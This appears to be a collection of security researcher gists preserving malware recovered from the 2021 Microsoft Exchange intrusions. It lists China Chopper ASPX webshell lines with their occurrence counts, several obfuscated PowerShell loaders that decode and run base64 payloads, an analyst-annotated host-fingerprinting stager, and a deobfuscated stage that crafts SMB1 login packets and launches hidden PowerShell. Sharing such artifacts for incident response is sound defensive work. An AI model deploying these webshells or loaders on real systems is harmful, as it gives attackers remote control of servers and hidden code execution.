
JohnHammond / china_chopper_source.csv
Created March 5, 2021 18:44
Microsoft Exchange Incident "China Chopper" ASPX Webshell source
# Occurrences, WebShell Source
190, <script language="JScript" runat="server">function Page_Load(){eval(Request["NO9BxmCXw0JE"],"unsafe");}</script>
50, <script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script>
11, <script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script>
7, <script language="JScript" runat="server">function Page_Load(){eval(Request["error"],"unsafe");}</script>
5, <script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["7gHQRih3fnam"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["coStWhkzUF7n"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["E9RyGFIM8h3S"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["EiH4yV2
JohnHammond / p.esonine.com_stager01.ps1
Created March 6, 2021 05:18
Microsoft Exchange Post-Exploitation
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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
JohnHammond / p.estonine.com_stager02.ps1
Created March 6, 2021 05:21
Microsoft Exchange Post-Exploitation Artifacts 02
# Recovered post-exploitation artifact (see gist description). Comments are analyst notes;
# the code below is reproduced exactly as found and is not meant to be run.
# Host fingerprint: first MAC address from `getmac /FO CSV` (header row skipped), kept as a string.
[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
# Presumably a single-instance guard: attempts to create/own a named global mutex.
# The mutex name 'Global\PSEXEC' is a host-level artifact a defender can look for.
try{
$name = 'Global\PSEXEC'
# NOTE(review): `$flase` is a typo of `$false`; it is an undeclared variable, so $exeflag starts as $null.
# Nothing in this excerpt reads $exeflag afterwards, so the created-new result is effectively discarded.
$exeflag = $flase
New-Object System.Threading.Mutex ($true,$name,[ref]$exeflag)
# Empty catch: any failure in the block above is silently ignored.
}catch{}
# Date stamp in yyMMdd form; how it is used is not visible in this excerpt.
$dt = Get-Date -Format 'yyMMdd'
# Marker-file path under %TEMP%. PowerShell does not treat backslash as an escape inside double
# quotes, so the literal value contains two backslashes: <TEMP>\\ccc.log. This path is a host IOC.
$path = "$env:temp\\ccc.log"
# "True"/"False" string recording whether the marker file already exists.
[string]$flag = test-path $path
JohnHammond / 188.166.162.201_update.png.ps1
Created March 6, 2021 05:47
Microsoft Exchange Post-Exploitation Stager 03
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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
JohnHammond / 188.166.162.201_update_stager.ps1
Created March 6, 2021 05:49
Microsoft Exchange Post-Exploitation Stager 04
((("{2070}{2069}{563}{1918}{1769}{1682}{51}{1258}{1854}{1127}{1374}{1599}{1168}{2427}{2098}{1823}{2257}{2997}{452}{1256}{1131}{155}{2084}{2946}{329}{1855}{1104}{1390}{1332}{1988}{202}{1781}{893}{2363}{2718}{818}{1334}{1965}{2542}{1164}{815}{772}{2274}{1214}{840}{2930}{2375}{384}{157}{2030}{2906}{2349}{2814}{1251}{2462}{1955}{3018}{687}{1636}{2950}{640}{1724}{2966}{2903}{992}{2636}{773}{1858}{2743}{1340}{561}{365}{521}{2341}{72}{442}{951}{944}{2160}{473}{2521}{806}{1311}{2348}{2126}{923}{2014}{2687}{2933}{845}{867}{742}{423}{2627}{624}{2144}{874}{2410}{330}{1267}{2233}{616}{713}{1878}{1562}{2617}{1917}{575}{841}{2109}{1109}{2161}{1587}{1272}{538}{2880}{532}{727}{886}{200}{737}{1150}{1972}{2001}{603}{2866}{2988}{963}{1830}{1441}{2618}{11}{753}{1021}{1305}{2021}{243}{2479}{919}{2548}{2059}{1569}{1968}{958}{2782}{1762}{2208}{2206}{2215}{814}{1748}{310}{1662}{299}{690}{1230}{1704}{1770}{1426}{1749}{2663}{1111}{1804}{2450}{2529}{2555}{1564}{735}{3006}{1579}{2776}{1120}{2853}{1399}{1210}{2220}{2231}{1186}{2262}{189
JohnHammond / stage5_deobfuscated_188.166.162.201_update.png.ps1
Created March 6, 2021 07:03
Microsoft Exchange Post-Exploitation Artifacts stage #5
function make_smb1_anonymous_login_packet {
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x00,0x48
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x73
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c if([IntPtr]
::Size -eq 4){=:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{=
'powershell.exe'};=New-Object System.Diagnostics.ProcessStartInfo;.FileName=;.Ar
guments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamRe
ader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]
::FromBase64String(''H4sIAAb/EF0CA7VWa2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9Y
KwwBTj4HC4Jh0+9/3jg1pqqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj4ZO6mw4oRa/u5C4GnZvxaM
jWK49GhfcB05YKEnSiTcOjpbX1+08TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNiVc
OKcWKtuOGiDtTIo/t9WPXYaHU7YRgKvCfPvHi4qy5rHe/5A7JBN4uMoo2dY8QXuS+iczhqEiQwJvYTeM
s9ml9iqOL8/o4yhwfDcDaFpmIhrGX8SIkAb8U0TyNOJYO0z/sCjwMh2nsKp6XoizjJW7BLC+Wyz+ERen
if ([IntPtr]::Size -eq 4) {
$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'
}else{
$b='powershell.exe'
};
$s = New-Object System.Diagnostics.ProcessStartInfo;
$s.FileName = $b;
$s.Arguments='-noni -nop -w hidden -c
&([scriptblock]::create((
New-Object IO.StreamReader(
New-Object IO.Compression.GzipStream((
New-Object IO.MemoryStream(,
[Convert]::FromBase64String(
''...BASE64GZIPDATA...''
))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))